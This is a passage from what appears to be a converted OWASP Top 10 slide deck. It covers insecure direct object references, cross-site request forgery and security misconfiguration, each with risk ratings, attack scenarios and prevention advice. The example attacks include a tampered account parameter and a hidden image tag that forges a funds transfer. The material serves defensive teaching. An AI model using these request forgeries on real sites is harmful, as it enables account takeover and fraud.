* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html ESAPI ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html Authenticator API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/User.html ESAPI User API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Guide_to_Authentication OWASP Development Guide: Chapter on Authentication]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_authentication OWASP Testing Guide: Chapter on Authentication]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/287.html CWE Entry 287 on Improper Authentication]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
 
<span class="T8">The primary recommendation for an organization is to make available to developers:</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T10">A single set of strong authentication and session management controls</span><span class="T8">. Such controls should strive to:</span><span class="odfLiEnd"> </span>
 
 
 
# ## <span style="display: block; float: left; min-width: 0.634cm">●)</span><span class="T8">meet all the authentication and session management requirements defined in OWASP’s </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download Application Security Verification Standard]</span><span class="T8"> (ASVS) areas V2 (Authentication) and V3 (Session Management).</span><span class="odfLiEnd"> </span>
 
## <span style="display: block; float: left; min-width: 0.634cm">●)</span><span class="T8">have a simple interface for developers. Consider the </span><span class="T8">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html ESAPI Authenticator and User APIs]</span><span class="T8"> as good examples to emulate, use, or build upon.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A2.</span><span class="odfLiEnd"> </span>
 
 
 
<div id="Title_27" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T29">Broken Authentication and Session Management</span>
 
 
 
</div></div><div id="Text_Placeholder_32" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A3</span><span class="odfLiEnd"> </span>
 
 
 
</div></div>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">9</span></span><span class="T4"><span title="page-number">9</span></span>
 
 
 
</div></div></div><div id="page10" class="dp3"><div id="Table_104" style="height: 7.053cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce96" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce97" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce98" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">COMMON</span>
 
| class="ce99" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce100" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">MODERATE</span>
 
| class="ce101" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro18"
 
| class="ce102" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the types of users of your system. Do any users have only partial access to certain types of system data?</span>
 
| class="ce103" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. Is access granted?</span>
 
| class="ce104" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws and code analysis quickly shows whether authorization is properly verified.</span>
 
| class="ce105" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such flaws can compromise all the data that can be referenced by the parameter. Unless the name space is sparse, it’s easy for an attacker to access all available data of that type.</span>
 
| class="ce106" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the exposed data.</span>
 
 
 
<span class="T8">Also consider the business impact of public exposure of the vulnerability.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenario</span>
 
 
 
<span class="T8">The application uses unverified data in a SQL call that is accessing account information:</span>
 
 
 
<span class="T26">  </span><span class="T26">String query = "SELECT * FROM accts WHERE account = ?";</span>
 
 
 
<span class="T26">  </span><span class="T26">PreparedStatement pstmt =</span><span class="T26"><br /></span><span class="T26">  connection.prepareStatement(query , … );</span>
 
 
 
<span class="T25">  </span><span class="T25">pstmt.setString( 1, request.getparameter("acct"));</span>
 
 
 
<span class="T26">  </span><span class="T26">ResultSet results = pstmt.executeQuery( );</span>
 
 
 
<span class="T8">The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account.</span>
 
 
 
<span class="T25">  </span><span class="T26">http://example.com/app/accountInfo?acct=</span><span class="T25">notmyacct</span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
 
<span class="T8">The best way to find out if an application is vulnerable to insecure direct object references is to verify that </span><span class="T11">all</span><span class="T8"> object references have appropriate defenses. To achieve this, consider:</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">For </span><span class="T10">direct </span><span class="T8">references to </span><span class="T10">restricted </span><span class="T8">resources, the application needs to verify the user is authorized to access the exact resource they have requested.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If the reference is an </span><span class="T10">indirect </span><span class="T8">reference, the mapping to the direct reference must be limited to values authorized for the current user.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference OWASP Top 10-2007 on Insecure Dir Object References]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html ESAPI Access Reference Map ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/org/owasp/esapi/AccessReferenceMap.html API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html ESAPI Access Control API]</span><span class="T30"> (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">For additional access control requirements, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements area for Access Control (V4)]</span><span class="T8">.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/639.html CWE Entry 639 on Insecure Direct Object References]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/22.html CWE Entry 22 on Path Traversal]</span><span class="T10"> </span><span class="T30">(which is an example of a Direct Object Reference attack)</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
 
<span class="T8">Preventing insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T10">Use per user or session indirect object references</span><span class="T8">. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP’s </span><span class="T8">[http://www.owasp.org/index.php/ESAPI ESAPI]</span><span class="T8"> includes both sequential and random access reference maps that developers can use to eliminate direct object references. </span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T10">Check access</span><span class="T8">. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.</span><span class="odfLiEnd"> </span>
 
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Insecure Direct Object References</span>
 
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A4</span><span class="odfLiEnd"> </span>
 
 
 
</div></div>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4">Can we squeeze a mention of ‘parameter tampering’?</span>
 
 
 
<span class="T4">It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</span>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">10</span></span><span class="T4"><span title="page-number">10</span></span>
 
 
 
</div></div></div><div id="page11" class="dp3"><div id="Table_104" style="height: 8.071cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce107" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce108" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
 
<span class="T12">AVERAGE</span>
 
| class="ce109" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">WIDESPREAD</span>
 
| class="ce110" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce111" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">MODERATE</span>
 
| class="ce112" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro22"
 
| class="ce113" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anyone who can trick your users into submitting a request to your website. Any website or other HTML feed that your users access could do this.</span>
 
| class="ce114" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. </span><span class="T11">If the user is authenticated</span><span class="T8">, the attack succeeds.</span>
 
| class="ce115" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">[http://www.owasp.org/index.php/CSRF CSRF]</span><span class="T8"> </span><span class="T8">takes advantage of web applications that allow attackers to predict all the details of a particular action.</span>
 
 
 
<span class="T8">Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.</span>
 
 
 
<span class="T8">Detection of CSRF flaws is fairly easy via penetration testing or code analysis.</span>
 
| class="ce116" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attackers can cause victims to change any data the victim is allowed to change or perform any function the victim is authorized to use.</span>
 
| class="ce117" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the affected data or application functions. Imagine not being sure if users intended to take these actions.</span>
 
 
 
<span class="T8">Consider the impact to your reputation.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenario</span>
 
 
 
<span class="T8">The application allows a user to submit a state changing request that does not include anything secret. Like so:</span>
 
 
 
<span class="T26">  </span><span class="T26">http://example.com/app/transferFunds?amount=1500</span><span class="T26"><br /></span><span class="T26">  &destinationAccount=4673243243</span>
 
 
 
<span class="T8">So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.</span>
 
 
 
<span class="T8">  </span><span class="T26"><img src="</span><span class="T25">http://example.com/app/transferFunds?</span><span class="T25"><br /></span><span class="T25">  amount=1500&destinationAccount=attackersAcct#</span><span class="T26">“</span><span class="T26"><br /></span><span class="T26">  width="0" height="0" /></span>
 
 
 
<span class="T8">If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable to CSRF?</span>
 
 
 
<span class="T8">The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.</span>
 
 
 
<span class="T8">You should check multistep transactions, as they are not inherently immune. Attackers can easily forge a series of requests by using multiple tags or possibly JavaScript.</span>
 
 
 
<span class="T8">Note that session cookies, source IP addresses, and other information that is automatically sent by the browser doesn’t count since this information is also included in forged requests.</span>
 
 
 
<span class="T8">OWASP’s </span><span class="T8">[http://www.owasp.org/index.php/CSRFTester CSRF Tester]</span><span class="T8"> tool can help generate test cases to demonstrate the dangers of CSRF flaws.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/CSRF OWASP CSRF Article]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet OWASP CSRF Prevention Cheat Sheet]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/CSRFGuard OWASP ]</span><span class="T11">[http://www.owasp.org/index.php/CSRFGuard CSRFGuard]</span><span class="T11">[http://www.owasp.org/index.php/CSRFGuard  - CSRF Defense Tool ]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/ESAPI ESAPI Project Home Page ]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html ESAPI ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html HTTPUtilities]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html  Class with ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html AntiCSRF]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html  Tokens]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005) OWASP Testing Guide: Chapter on CSRF Testing]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/CSRFTester OWASP ]</span><span class="T11">[http://www.owasp.org/index.php/CSRFTester CSRFTester]</span><span class="T11">[http://www.owasp.org/index.php/CSRFTester  - CSRF Testing Tool ]</span><span class="T11"><br /></span><span class="T11"><span class="odfLiEnd"> </span></span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/352.html CWE Entry 352 on CSRF ]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent CSRF?</span>
 
 
 
<span class="T8">Preventing CSRF requires the inclusion of a unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">OWASP’s </span><span class="T8">[http://www.owasp.org/index.php/CSRFGuard CSRF Guard]</span><span class="T8"> can be used to automatically include such tokens in your Java EE, .NET, or PHP application. OWASP’s </span><span class="T8">[http://www.owasp.org/index.php/ESAPI ESAPI]</span><span class="T8"> includes token generators and validators that developers can use to protect their transactions.</span>
 
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Cross-Site Request Forgery</span><span class="T5"><br /></span><span class="T5">(CSRF)</span>
 
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A5</span><span class="odfLiEnd"> </span>
 
 
 
</div></div>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">11</span></span><span class="T4"><span title="page-number">11</span></span>
 
 
 
</div></div></div><div id="page12" class="dp3"><div id="Table_104" style="height: 7.859cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce118" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce119" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span><span class="T12"><br /></span><span class="T12">EASY</span>
 
| class="ce120" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">COMMON</span>
 
| class="ce121" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">EASY</span>
 
| class="ce122" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">MODERATE</span>
 
| class="ce123" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro21"
 
| class="ce124" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anonymous external attackers as well as users with their own accounts that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.</span>
 
| class="ce125" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</span>
 
| class="ce126" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.</span>
 
| class="ce127" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise.</span>
 
| class="ce128" style="text-align: left; width: 3.175cm" |
 
<span class="T8">The system could be completely compromised without you knowing it. All your data could be stolen or modified slowly over time. </span>
 
 
 
<span class="T8">Recovery costs could be expensive.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div>
 
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenarios</span>
 
 
 
<span class="T11">Scenario #1</span><span class="T8"><nowiki>: Your application relies on a powerful framework like Struts or Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaw in your app.</nowiki></span>
 
 
 
<span class="T11">Scenario #2</span><span class="T8"><nowiki>: The admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</nowiki></span>
 
 
 
<span class="T11">Scenario #3</span><span class="T8"><nowiki>: Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she reverses to get all your custom code. She then find a serious access control flaw in your application.</nowiki></span>
 
 
 
<span class="T11">Scenario #4</span><span class="T8"><nowiki>: App Server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.</nowiki></span>
 
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
 
<span class="T8">Have you performed the proper security hardening across the entire application stack?</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.558cm">●.</span><span class="T8">Do you have a process for keeping all your software up to date? This includes the OS, Web/App Server, DBMS, applications, and </span><span class="T10">all code libraries</span><span class="T8">.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.558cm">●.</span><span class="T8">Is everything unnecessary disabled, removed, or not installed (e.g. ports, services, pages, accounts, privileges)?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.558cm">●.</span><span class="T8">Are default account passwords changed or disabled?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.558cm">●.</span><span class="T8">Is your error handling set up to prevent stack traces and other overly informative error messages from leaking?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.558cm">●.</span><span class="T8">Are the security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries understood and configured properly?</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">A concerted, repeatable process is required to develop and maintain a proper application security configuration.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Configuration OWASP Development Guide: Chapter on Configuration]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Error_Handling OWASP Code Review Guide: Chapter on Error Handling]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_configuration_management OWASP Testing Guide: Configuration Management]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T11"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006) OWASP Testing Guide: Testing for Error Codes]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management OWASP Top 10 2004 - Insecure Configuration Management ]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8">For additional requirements in this area, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements area for Security Configuration (V12)]</span><span class="T8">.</span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.pcmag.com/article2/0,2817,11525,00.asp PC Magazine Article on Web Server Hardening]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/2.html CWE Entry 2 on Environmental Security Flaws]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cisecurity.org/en-us/?route=downloads.benchmarks CIS Security Configuration Guides/Benchmarks]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
 
<span class="T8">The primary recommendations are to establish all of the following:</span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically. This process should be automated to minimize the effort required to setup a new secure environment.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include </span><span class="T10">all code libraries as well</span><span class="T8">, which are frequently overlooked.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">A strong network architecture that provides good separation and security between components.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Consider running scans and doing audits periodically to help detect future misconfigurations or missing patches.</span><span class="odfLiEnd"> </span>
 
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Security Misconfiguration</span>
 
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A6</span><span class="odfLiEnd"> </span>
 
 
 
</div></div>
 
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">12</span></span><span class="T4"><span title="page-number">12</span></span>
 
 
 
</div></div></div><div id="page13" class="dp3"><div id="Table_104" style="height: 7.859cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
